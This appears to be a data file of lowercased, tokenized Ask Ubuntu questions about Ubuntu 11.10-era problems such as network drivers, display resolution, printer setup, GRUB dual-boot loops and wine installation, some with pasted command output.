output default -- mode `` 1024x768_60.00 '' xrandr : failed to get size of gamma for output default xrandr : screen can not be larger than 640x480 ( desired size 1024x768 )
74572	installed ubuntu 11.10 , and networking constantly fails	i just installed ocelot on my new machine ( with an asus m5a99x evo motherboard and on-board gigabit ethernet ) , and i asked it to download updates while it installed . the install took forever , the longest part being the download of updates , which should have been my first clue . post install , accessing the internet is sketchy at best , but mostly just broken . the adapter consistently fails to pull down down an ip address or the dns addresses from my router . i should also note that i know this is n't a hardware problem , because i can boot into windows 7 ( dual boot ) , and the ethernet works just fine . actually , blazing fast might be a better word . but there are many things ( primarily software development ) that i need to do in ubuntu instead of windows . i feel that it is a driver issue , but i do n't even know where to start , since i 've always just relied on ubuntu to install the correct driver automatically for me . why would the driver be wrong , and what should i do about it ?
74575	what should my mac address be ? ( now shows 00:00:00:00:00:00 )	i have three computers all wired into my router . the box i 'm posting this from is running ubuntu 11.10 , and another machine is running xubuntu 11.10 both connected automatically when the ethernet cable was plugged in . however , my wife 's computer , running ubuntu 10.10 , can not connect to the eth0 connection . i checked the connection 's properties and the mac address is all zeroes ! how do i determine what numbers to plug into the mac address field ?
74577	intel hd graphics 3000 with 1080 monitor	i have a macbook with the intel hd graphics 3000 . when i plug in my 24in dell 1920x1080 monitor and go to display settings the maximum resolution is 1280x1024 . how can i setup my monitor with 1920x1080 resolution ?
74578	how do i set sqlite data browser as the default application for .sqlite3 files ?	when i try to open a .sqlite3 file , i get the following error : there is no application installed for sqlite3 database files when trying to select a default application , the sqlite database browser is not listed , despite it being installed . also , because the .sqlite3 file does not have a default application , it does not show up in the file browser within gedit , making things pretty confusing . how do i set up the default application ? i am running ubuntu 11.10 .
74584	what p.c setup is guaranteed to work with ubuntu ?	would that be the most common branded p.c and if so what model i have a custom built p.c which has a 64 bit gigabyte motherboard , and intel dualcore 2.5ghz processor and nvidia gforce 9400 card . so far i have managed to get 9.10 to install but have to use distro upgrade to get later versions . and 11.10 wont boot normally , i get a screen full stuff ending in checking battery state . the only way i can get that to work is to select previos versions then the first option in the grub . the main annoyance with 11.10 on my pc is startup manager cant be set , so it will always boot into error message as that is default . i like my set up to boot into windows7 by default or i choose ubuntu . its just annoying so i have down graded to 10.04 and think i will have to stick with that till i need a new p.c or lts runs out
74593	messed up file permissions	not being an expert in linux/ubuntu , i had to install from scratch today and messed up w/file permissions . the thing is that , when backing everything up before reinstalling , a couple of important documents could n't be copied to the external drive , so i used gksudo nautilus to be able to . now i 've copied them back and i ca n't use them . they are locked , a lock icon appears on a corner and the original error message shows again . is there a graphical/easy way to set file permissions back to normal ? i 've read about chmod fchmod and chown and i would like to avoid them if possible . if there 's no choice , can any of you please give me a quick example on how to use it ? thank you so much ub . community !
74601	howto set up only bg color of window , not all child widgets	i need change only background colour of window , and keep widgets in system colours . the space between boxes should keep different colour http : //ubuntuone.com/756mwff2htywgigcoccmez something like this http : //ubuntuone.com/3jcdqhtst6kjfbyq6ymh7f i do n't know if clutter is here better way to make it look this way
74602	how do i fix a garbled screen on a gateway lt3103u ?	i 've been having garbled screen problems on a gateway lt3103u on ubuntu for a while . i just did a fresh install of ubuntu 11.10 and continue to have issues . i installed xubuntu-desktop in case the issues had to do with the sophisticated gnome graphics . the problem is less bad , but it 's still there . after a few minutes of using xfce , the screen gets garbled . i assume this has something to do with the graphics card , but i do n't know how to go about troubleshooting something like this . where should i start ? update : here is the description of the vga card from lspci -vvv : 01:05.0 vga compatible controller : ati technologies inc rs690m [ radeon x1200 series ] ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 028c control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 , cache line size : 32 bytes interrupt : pin a routed to irq 18 region 0 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at f0100000 ( 64-bit , non-prefetchable ) [ size=64k ] region 4 : i/o ports at 9000 [ size=256 ] region 5 : memory at f0000000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at < unassigned > [ disabled ] capabilities : [ 50 ] power management version 2 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 kernel driver in use : radeon kernel modules : radeon update : setting grub_cmdline_linux= '' nomodeset '' in /etc/default/grub seems to have fixed it in both ubuntu and xubuntu-desktop . i will test it for a day or so to see if the problems recur and then post more detail with some links to an explanation .
74610	expo edges not working in unity ?	expo edge bindings and keyboard bindings do n't work at all for me after upgrading to 11.10 . they worked fine in 11.04 . now the only way i can get the expo view is via the unity sidebar icon . anyone know how to fix this ? i really like the edge bindings . ( yes , i 'm sure expo is enabled , and i 've tried various combinations of keyboard/edge settings in compiz config settings manager )
74615	hp probook 4530s - fans are always on and noisy	how can i get the fans of my hp probook 4530s to slow down when the cpu is cool ? the following attempts to fix the problem that have been unsuccesful : fresh install of oneiric i disabled discrete graphics ( radeon ) : blacklisted and switched off with vgaswitcheroo i updated my bios to f.20 ( latest on hp website ) i disabled `` fan always on when on ac '' option on the bios i tried to set up lm-sensors and fancontrol , but pwmconfig script returns me that `` there are no pwm-capable sensor modules installed '' ... not very encourageing it seems to me that the fan control worked fine in 11.04 ( natty ) . what has changed on 11.10 ( oneiric ) ? my temperatures seem pretty correct : arnaud @ tool : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +49.0°c ( crit = +128.0°c ) temp2 : +47.0°c ( crit = +128.0°c ) temp3 : +33.0°c ( crit = +128.0°c ) temp4 : +46.0°c ( crit = +128.0°c ) temp5 : +25.0°c ( crit = +128.0°c ) temp6 : +0.0°c ( crit = +128.0°c ) temp7 : +0.0°c ( crit = +128.0°c ) temp8 : +0.0°c ( crit = +128.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +49.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +44.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +44.0°c ( high = +86.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : -128.0°c
74616	i 'm trying to print on my hp deskjet 841c printer in ubuntu 10.04 , but it 's not working	as soon as i hooked the printer into the computer , ubuntu said that it was installed . so , i tried printing , and a paper prints saying `` ** unable to open the initial device , quitting . '' then i run a diagnostic on the printer , and it comes up with nothing , except for a troubleshoot document , in which i do n't understand at all . ( will post results if asked , they 're just extremely long ) . the next thing i do is google it , and i find a link to download and install the drivers for it , so i follow the instructions : http : //hplipopensource.com/hplip-web/install/install/index.html i type what 's in the first step , then hit enter . instead of saying what it 's suppose to ( in the 2nd picture on the link ) , it says : `` sh : ca n't open hplip-3.11.10.run '' . that 's all it says . i need help ! any suggestions would be extremely appreciated !
74623	why will one user account of three not log-in ?	our family has three user account in /home . i have just installed ubuntu 11.10 and two of the three log-in to xorg ok but the third just cycles back to the log-in screen ( gdm ? ) mine , of course : ( is there a log file i can s\check to find out why the third user account is cycling back to the beginning ? i can log-in fine to a virtual terminal , it 's just xorg that is the problem , so i presume it is something in my home directory that should be deleted . thanks !
74628	enabling longer period of inactivity before suspending	i 'm just wondering how i would go about having more than 1 hour of inactivity . it would be better if there were higher options , such as 3 hours . thanks !
74629	ubuntu friendly laptop equivalent to macbook pro	i am in the market for a new high-end ubuntu laptop , and i was wondering if anyone had any recommendations . my requirements are : that it be crazy-fast ( a quad-core i7 processor will do nicely ) excellent battery life under real usage ( over 7 hours ) high-resolution screen ( at least 1440x900 ) basically , i want the macbook pro , but with ubuntu instead of os x. i know i could just buy the macbook pro and install ubuntu on it , but my understanding is that recent macbook hardware is not well-supported under ubuntu . plus , i 'd prefer not to pay a premium on apple hardware . is there anything out there that can run ubuntu well , and still compete with apple on performance , battery life , and screen resolution ? edit : just to follow up , i ended up buying a lenovo w520 , which works great , except that for a long time the nvidia optimus graphics were impossible to get working . now they work quite well , but are still an ordeal to set up . complicating things is a bios bug that lenovo refuses to acknowledge or fix . in the future , i 'm going to stay away from nvidia graphics on laptops at all costs , and probably prefer other brands to lenovo .
74631	how do i search my command-line history for commands i used before ?	other than viewing the history , is there a way to filter my history ? say i want to search for a command that started with `` ssh '' ?
74636	grub windows 7 loop	i installed ubuntu 11.10 . i install it on the same harddrive as my windows 7 . when i installing , i created a new partition in a free space that i created . in the creat partition box at the bottom , i chose windows 7 boot . now im mess-up . everytime i choose windows 7 it bring me back to the grub menu . how can i fix it ?
74637	navigation when on the command line	other than ctrl + a and ctrl + e to jump to the front or end of the command-line , what other things can you do ? is it possible to delete the entire line ? or to the next or pervious word in the line ?
74645	possible to install ubuntu-desktop and then boot to no gui	i 've installed ubuntu server . i 'd like to add the gui with ubuntu-desktop package , but if i do that can i still get the no-gui server interface as the default ? what i basically need is the no-gui and the ability to start a gui when needed . possible ?
74653	how can i remove the translation entries in apt ?	this is the output of aptitude update : ign http : //archive.canonical.com natty inrelease ign http : //extras.ubuntu.com natty inrelease ign http : //dl.google.com stable inrelease ign http : //security.ubuntu.com natty-security inrelease hit http : //deb.torproject.org natty inrelease get:1 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //us.archive.ubuntu.com natty inrelease ign http : //us.archive.ubuntu.com natty-updates inrelease hit http : //archive.canonical.com natty release.gpg hit http : //extras.ubuntu.com natty release.gpg hit http : //security.ubuntu.com natty-security release.gpg hit http : //us.archive.ubuntu.com natty release.gpg hit http : //security.ubuntu.com natty-security release hit http : //archive.canonical.com natty release hit http : //extras.ubuntu.com natty release get:2 http : //dl.google.com stable release [ 1,338 b ] hit http : //us.archive.ubuntu.com natty-updates release.gpg hit http : //security.ubuntu.com natty-security/main sources hit http : //archive.canonical.com natty/partner amd64 packages hit http : //deb.torproject.org natty/main amd64 packages hit http : //extras.ubuntu.com natty/main sources hit http : //us.archive.ubuntu.com natty release hit http : //security.ubuntu.com natty-security/restricted sources hit http : //security.ubuntu.com natty-security/universe sources hit http : //security.ubuntu.com natty-security/multiverse sources hit http : //security.ubuntu.com natty-security/main amd64 packages hit http : //security.ubuntu.com natty-security/restricted amd64 packages ign http : //archive.canonical.com natty/partner translationindex hit http : //extras.ubuntu.com natty/main amd64 packages ign http : //extras.ubuntu.com natty/main translationindex hit http : //security.ubuntu.com natty-security/universe amd64 packages hit http : //security.ubuntu.com natty-security/multiverse amd64 packages ign http : //security.ubuntu.com natty-security/main translationindex ign http : //security.ubuntu.com natty-security/multiverse translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex ign http : //deb.torproject.org natty/main translationindex ign http : //security.ubuntu.com natty-security/universe translationindex hit http : //us.archive.ubuntu.com natty-updates release hit http : //us.archive.ubuntu.com natty/main sources hit http : //us.archive.ubuntu.com natty/restricted sources hit http : //us.archive.ubuntu.com natty/universe sources hit http : //us.archive.ubuntu.com natty/multiverse sources hit http : //us.archive.ubuntu.com natty/main amd64 packages hit http : //us.archive.ubuntu.com natty/restricted amd64 packages hit http : //us.archive.ubuntu.com natty/universe amd64 packages hit http : //us.archive.ubuntu.com natty/multiverse amd64 packages ign http : //us.archive.ubuntu.com natty/main translationindex ign http : //us.archive.ubuntu.com natty/multiverse translationindex ign http : //us.archive.ubuntu.com natty/restricted translationindex ign http : //us.archive.ubuntu.com natty/universe translationindex hit http : //us.archive.ubuntu.com natty-updates/main sources hit http : //us.archive.ubuntu.com natty-updates/restricted sources hit http : //us.archive.ubuntu.com natty-updates/universe sources get:3 http : //dl.google.com stable/main amd64 packages [ 469 b ] ign http : //dl.google.com stable/main translationindex hit http : //us.archive.ubuntu.com natty-updates/multiverse sources hit http : //us.archive.ubuntu.com natty-updates/main amd64 packages hit http : //us.archive.ubuntu.com natty-updates/restricted amd64 packages hit http : //us.archive.ubuntu.com natty-updates/universe amd64 packages hit http : //us.archive.ubuntu.com natty-updates/multiverse amd64 packages ign http : //us.archive.ubuntu.com natty-updates/main translationindex ign http : //us.archive.ubuntu.com natty-updates/multiverse translationindex ign http : //us.archive.ubuntu.com natty-updates/restricted translationindex ign http : //us.archive.ubuntu.com natty-updates/universe translationindex ign http : //archive.canonical.com natty/partner translation-en_us ign http : //extras.ubuntu.com natty/main translation-en_us ign http : //extras.ubuntu.com natty/main translation-en ign http : //archive.canonical.com natty/partner translation-en ign http : //security.ubuntu.com natty-security/main translation-en_us ign http : //security.ubuntu.com natty-security/main translation-en ign http : //security.ubuntu.com natty-security/multiverse translation-en_us ign http : //security.ubuntu.com natty-security/multiverse translation-en ign http : //security.ubuntu.com natty-security/restricted translation-en_us ign http : //security.ubuntu.com natty-security/restricted translation-en ign http : //security.ubuntu.com natty-security/universe translation-en_us ign http : //security.ubuntu.com natty-security/universe translation-en ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release ign http : //dl.google.com stable/main translation-en_us hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release ign http : //dl.google.com stable/main translation-en hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources ign http : //us.archive.ubuntu.com natty/main translation-en_us ign http : //us.archive.ubuntu.com natty/main translation-en hit http : //ppa.launchpad.net natty/main amd64 packages ign http : //ppa.launchpad.net natty/main translationindex ign http : //us.archive.ubuntu.com natty/multiverse translation-en_us ign http : //us.archive.ubuntu.com natty/multiverse translation-en ign http : //us.archive.ubuntu.com natty/restricted translation-en_us ign http : //us.archive.ubuntu.com natty/restricted translation-en ign http : //us.archive.ubuntu.com natty/universe translation-en_us ign http : //us.archive.ubuntu.com natty/universe translation-en ign http : //us.archive.ubuntu.com natty-updates/main translation-en_us ign http : //us.archive.ubuntu.com natty-updates/main translation-en ign http : //us.archive.ubuntu.com natty-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com natty-updates/multiverse translation-en ign http : //us.archive.ubuntu.com natty-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com natty-updates/restricted translation-en ign http : //us.archive.ubuntu.com natty-updates/universe translation-en_us ign http : //us.archive.ubuntu.com natty-updates/universe translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //archive.getdeb.net natty-getdeb inrelease ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en hit http : //archive.getdeb.net natty-getdeb release.gpg hit http : //archive.getdeb.net natty-getdeb release ign http : //deb.torproject.org natty/main translation-en_us ign http : //deb.torproject.org natty/main translation-en hit http : //archive.getdeb.net natty-getdeb/apps amd64 packages ign http : //archive.getdeb.net natty-getdeb/apps translationindex ign http : //archive.getdeb.net natty-getdeb/apps translation-en_us ign http : //archive.getdeb.net natty-getdeb/apps translation-en fetched 2,005 b in 45s ( 44 b/s ) reading package lists ... is there any way i can get rid of the translation stuff ? i 'm tired of it resulting in tons of repository checks rather than it checking far less repositories ( 69 actual repos vs. 169 checks )
74657	uninstall .deb installed through software center	downloaded a .deb file for a game ( voxatron ) and installed it through the software center . searching the 'installed ' section of the software center for 'voxatron ' or 'vox ' produces nothing . the software center history is also devoid of any reference to voxatron . is there a way to un-install .deb packages downloaded outside of the software center but installed through the software center ?
74658	can not play blocks that matter indie bundle game	i have installed latest jdk 1.7.0_u1 using the method provided at this page webupd8 . i have also extracted the deb setup i got and edited the control file so as not to install java6 . i 'm getting the following error when i run using : java -jar /opt/blocksthatmatter/btm.jar exception in thread `` main '' java.lang.unsatisfiedlinkerror : no lwjgl in java.library.path at java.lang.classloader.loadlibrary ( classloader.java:1860 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at org.lwjgl.sys $ 1.run ( sys.java:73 ) at java.security.accesscontroller.doprivileged ( native method ) at org.lwjgl.sys.doloadlibrary ( sys.java:66 ) at org.lwjgl.sys.loadlibrary ( sys.java:82 ) at org.lwjgl.sys. < clinit > ( sys.java:99 ) at org.lwjgl.util.timer. < clinit > ( timer.java:50 ) at microsoft.xna.framework.game. < init > ( game.java:19 ) at org.flixel.flxfactory. < init > ( flxfactory.java:74 ) at sss.btm.main.blocksthatmatter.main ( blocksthatmatter.java:13 )
74666	is there any ppa that follow the latest intel opensource driver for ubuntu 10.04 ?	intel have opensource driver source repositories the question is , is there any ppa that try to create deb package from the repositories that follow the latest version ?
74668	share my dvd drive with my mac mini over lan	i 've got a mac mini that does n't have a dvd drive . apple says you can share a dvd drive over the network , but their `` magical '' approach only works with windows and other macs . http : //support.apple.com/kb/ht1777 ? viewlocale=en_us can i get remote disc to work with my ubuntu laptop or get this functionality with another method ? i do n't mind setting up a network share somehow ( nfs or similar ) but it has got to be easy to turn on and off , with some script i 'd imagine . i use my laptop in public spaces very often and i do n't want others picking up my open dvd drive while i use public wifi . on the mac side , i 'd want the dvd to show up in finder . i do n't mind running a script here either to mount/unmount the drive . ultimately , the solution has to be frictionless . it should work in any lan environment . you can assume dhcp is on and the ip addresses for both computers will change once in a while . i also alternate between wifi and wired depending on where my laptop happens to be in the house . your thoughts are appreciated !
74669	in the rhythmbox why are the music preferred format settings for ogg vorbis disabled ?	in the rhythmbox preferences , in the music tab , under library structure , there is a preferred format setting . in previous versions of ubuntu , you could edit the default profiles in the preferred format setting . in 11.10 , this option is disabled . why ? here is a page the highlights what you used to be able to do .
74672	how to setup a hp laserjet 4100n printer ?	hello everyone i 'm trying to setup my hp laserjet 4100n printer , but ubuntu 11.10 does n't recognize it . i try to install the hplip or linux drivers , but then when it says to restart your computer when you have a parallel port printer nothing happens once you restart it . i try the installation 3 times ignoring the step where it says to restart , but then it says your printer is not recognize please help . i 'm using a parallel to usb converter and i know it works because i try it in windows and the printer works like a charm.please help anyone ? i also try installing it in my sisters ubuntu 11.04 and it recognize it and prints . also when i share the printer in my sister computers it works on mine like a network printer , but it has to be connected to my sisters computer in order for me to print . i also forgot to mention that i have another printer connected to this computer , i try deleting and disconnecting my other printer , but it still does n't detect my laserjet 4100n . this is what i get and the printer is connected note : defaults for each question are maked with a '* ' . press < enter > to accept the default . installation mode -- -- -- -- -- -- -- -- - automatic mode will install the full hplip solution with the most common options . custom mode allows you to choose installation options to fit specific requirements . please choose the installation mode ( a=automatic* , c=custom , q=quit ) : a initializing . please wait ... introduction -- -- -- -- -- -- this installer will install hplip version 3.11.10 on your computer . please close any running package management systems now ( yast , adept , synaptic , up2date , etc ) . distro/os confirmation -- -- -- -- -- -- -- -- -- -- -- distro appears to be ubuntu 11.10 . is `` ubuntu 11.10 '' your correct distro/os and version ( y=yes* , n=no , q=quit ) ? y enter user password -- -- -- -- -- -- -- -- -- - please enter the user ( jab ) 's password : password accepted installation notes -- -- -- -- -- -- -- -- -- enable the universe/multiverse repositories . also be sure you are using the ubuntu `` main '' repositories . see : https : //help.ubuntu.com/community/repositories/ubuntu for more information . disable the cd-rom/dvd source if you do not have the ubuntu installation media inserted in the drive . during the install process you will be added to the lp and lpadmin group , please quit the installer before the setup stage , log out , log back in , and run hp-setup to complete the install . please read the installation notes . press < enter > to continue or 'q ' to quit : running pre-install commands -- -- -- -- -- -- -- -- -- -- -- -- -- -- ok checking for network connection -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - network connection present . running pre-package commands -- -- -- -- -- -- -- -- -- -- -- -- -- -- sudo dpkg -- configure -a ( pre-depend step 1 ) sudo apt-get install -- yes -- force-yes -f ( pre-depend step 2 ) sudo apt-get update ( pre-depend step 3 ) ok dependency and conflict resolution -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- warning : a previous install of hplip is installed and/or running . sudo apt-get remove -- assume-yes hplip hpijs hplip-cups hplip-data libhpmud0 foomatic-db-hpijs ( removing old hplip version ) warning : hplip removal failed . the previous install may have been installed using a tarball or this installer . warning : continuing to run installer - this installation should overwrite the previous one . running post-package commands -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ok re-checking dependencies -- -- -- -- -- -- -- -- -- -- -- -- ok pre-build commands -- -- -- -- -- -- -- -- -- ok build and install -- -- -- -- -- -- -- -- - running './configure -- with-hpppddir=/usr/share/ppd/hp -- libdir=/usr/lib64 -- prefix=/usr -- enable-udev-acl-rules -- enable-qt4 -- enable-doc-build -- disable-cups-ppd-install -- disable-foomatic-drv-install -- disable-foomatic-ppd-install -- disable-hpijs-install -- disable-policykit -- enable-cups-drv-install -- enable-hpcups-install -- enable-network-build -- enable-dbus-build -- enable-scan-build -- enable-fax-build' please wait , this may take several minutes ... command completed successfully . running 'make clean' please wait , this may take several minutes ... command completed successfully . running 'make' please wait , this may take several minutes ... command completed successfully . running 'sudo make install' please wait , this may take several minutes ... command completed successfully . build complete . post-build commands -- -- -- -- -- -- -- -- -- - sudo /usr/sbin/usermod -a -glp , lpadmin jab ( post-build step 1 ) close hp_systray -- -- -- -- -- -- -- -- sending close message to hp-systray ( if it is currently running ) ... restart or re-plug is required -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- if you are installing a usb connected printer , and the printer was plugged in when you started this installer , you will need to either restart your pc or unplug and re-plug in your printer ( usb cable only ) . if you choose to restart , run this command after restarting : hp-setup ( note : if you are using a parallel connection , you will have to restart your pc . if you are using network/wireless , you can ignore and continue ) . restart or re-plug in your printer ( r=restart , p=re-plug in* , i=ignore/continue , q=quit ) : p please unplug and re-plugin your printer now . press < enter > to continue or 'q ' to quit : printer setup -- -- -- -- -- -- - please make sure your printer is connected and powered on at this time . error : hp-setup failed . please run hp-setup manually .
74673	how to change alias in empathy ?	i am unable to change the alias in empathy . the change in avatar is updating but alias always seems to stay the same . the alias works with google account but not with the rest . please help me fix it .
74677	why do i get the error message `` failed to load session ubuntu-2d '' ?	my ubuntu 11.10 installation worked real good for two weeks . after the first few ubuntu updates ( i am not sure if this is the cause ) i am not able to use unity ! when i login to ubuntu 2d , i get the following error : failed to load session `` ubuntu-2d '' the only option in this popup is a logout button . hence , i am not able to use unity . when i try to login to unity , at times it work.. but launcher and panel does not start . i have to press ctrl+alt+t to get a terminal and start the launcher manually ! how do i solve these problems ? i did reach but i am not able to see others facing this issue . i also do not know the location of logs , please let me know where to look for and i will update this question with more information . thanks for the help . ps : currently i use the gnome-shell with no problem . i am also able to login to gnome classic .
74680	need to change strong passphrase for private folder	i want to sync .private on two computers through ubuntu one . problem is that the two computers have different strong passphrases for the private folder . i have the passphrases recorded on paper . i have not put any data in the private folder yet on either computer . what would be the way to change the passphrase on one machine to match the other . both computers are running 11.04 .
74683	failed to spawn hostname main process	i have a problem with my ubuntu 10.04.3 server . after changing user home directory ( usermod -m -d /home/username username ) my system began work very strange . when try to use `` ls -la '' command , bash said me that `` no such command found '' .same output for `` cat '' command.i tried to restart machine , but after restarting the following messages appeared on screen ( something like this ) : failed to spawn hostname main process failed to spawn plymouth main process failed to spawn hwlock main process failed to spawn mountall main process does everybody knows what happened ? i will very appreciate for your help .
74684	ext4 volume as file on ntfs volume	i was running out of space on my ext3 root volume , so i created a ext4 volume as a file and saved it on a ntfs partition . then made this ext4 vol as a permanent mount . purpose was to have all the linux file permissions but ntfs does n't allow this . is it the right approach ? i see a lot of io happens on the ntfs partition when i access the mounted ( ext4 ) vol , is it ok ?
74686	is there a utility to transpose a .csv file ?	i have some csv files with too many columns for libreoffice calc to open , but only a few rows . if i can transpose the csv file , it should be ok as calc can deal with very many more rows than columns .
74690	how to install 32 bit wine on 64 bit ubuntu ?	currently i 'm running ubuntu 11.10 64 bit on my laptop and i want to install some windows programs with wine ( dreamweaver cs5/starcraft ii etc ) but these programs require the 32bit version of wine to work even being in a 64bit environment ... i 'm a fedora user most of the time and in that distro installing 32bit versions of apps inside of a 64bit system is never a problem , but did n't find a way to do that on ubuntu .
74692	wifi for centrino wireless-n 1000 intel corporation ( hp pavillion dm4 - 2070us ) is not working	i have a hp pavillion dm4-2070us in which has an intel corporation centrino wireless-n 1000 . the problem is that my computer doesnt show the wireless networks after i upgraded my system to ubuntu 11.10 . following is my output for sudo lshw -class network : *-network disabled description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 00 serial : 8c : a9:82:81:5a:30 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:42 memory : c2500000-c2501fff *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : c0 serial : 2c:41:38:07 : f3 : e3 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.1.7 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : c1400000-c143ffff ioport:2000 ( size=128 ) the output for rfkill list all : rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hp-wwan : wireless wan soft blocked : no hard blocked : no also i searched about the status of the wifi network being shown as disabled . somehow everything pointed to the fact that my wireless device is switched off and it can be switched on from windows only . however , i dont have windows partition and it has just ubuntu 11.10 so i dont see any point in switching the device on in windows .
74694	problem happens when clicking links in a pdf file using evince	in ubuntu 11.10 , i use evince 3.2.0 to read pdf files . as we know many research articles have literature citation and so their pdf files would have many `` inter links '' which link from citation to the `` reference list '' . and if we click the links , it will jump to revelant reference term , which is very convenient . the problem comes when i click two different files : first file : downlod here if i click the cite , it would automatically jump to the reference list , it ok ! second file : downlod here problem comes ! if i click the cite , it will jump , too . however , the page view would become very small and i have to ajdust zoom manually ! perhaps you 'll say it may be due to the second file itself , not evince . however , i 've tried okular , and it works perfect , no such problem . so perhaps some problems are due to evince ? ( the reason i do n't use okular is that it does n't work well with text selecting . )
74701	why wo n't my computer hibernate and shut down properly ?	i have ubuntu 11.10 and hibernate is n't working on this machine . i looked at this post and after the string # swap was on /dev/âś.. nothing appears . i can not find the file : /usr/lib/hal/scripts/linux/hal-system-power-suspend-linux . moreover , s2disk does not work properly and the computer can not hibernate . now i can not even shut down the system - the process does not complete . i need to press the power button every time .
74702	how can i disable chrome/ium 's wrench menu ?	chromium now supports unity menu bar integration . because i can use the menu by moving my mouse to the panel , i have no need for the wrench menu . is there a way to disable it ?
74703	configure firewall ( shorewall/ufw ) to allow traffic for services on an ubuntu server	i have an ubuntu server 11.04 x64 which i want to secure . the server will be open to internet and i want to be able to ssh/sftp into the machine and the ssh-server runs on a custom set port . i also want a web server accessible from the internet . these tasks seems not to hard to perform but i also want samba-shares to be accessible from within the local network and this seems to be a bit trickier . if possible i also want to be able to `` stealth '' the ports necessary to protect the server further but also allow the samba-shares to be automatically found within the local network . i 've never configured firewalls before except for a router and i always bump into a bunch of problem when doing it all by myself so i was hoping for some tips or preferably a guide on how to this . thank you ! update : on second thought i 'd could just as likely go with ufw if the same settings are achievable ( `` stealth '' ports ) .
74706	store multiple synchronized copies of a file	i would like some advice on how to , if it is possible , do the following : - i want to have the same text file in a number of locations . i would like all files to update no matter which file i modify . i want to store a copy of this file on an external hard drive . i would like this file to update when the external hard drive is connected . it would be great if modifying this file resulted in the files on the computer also updating . this is so i can keep track of how and where i have created system back ups . also to have my clumsy documentation of installs & changes etc close at hand and accessible . : - )
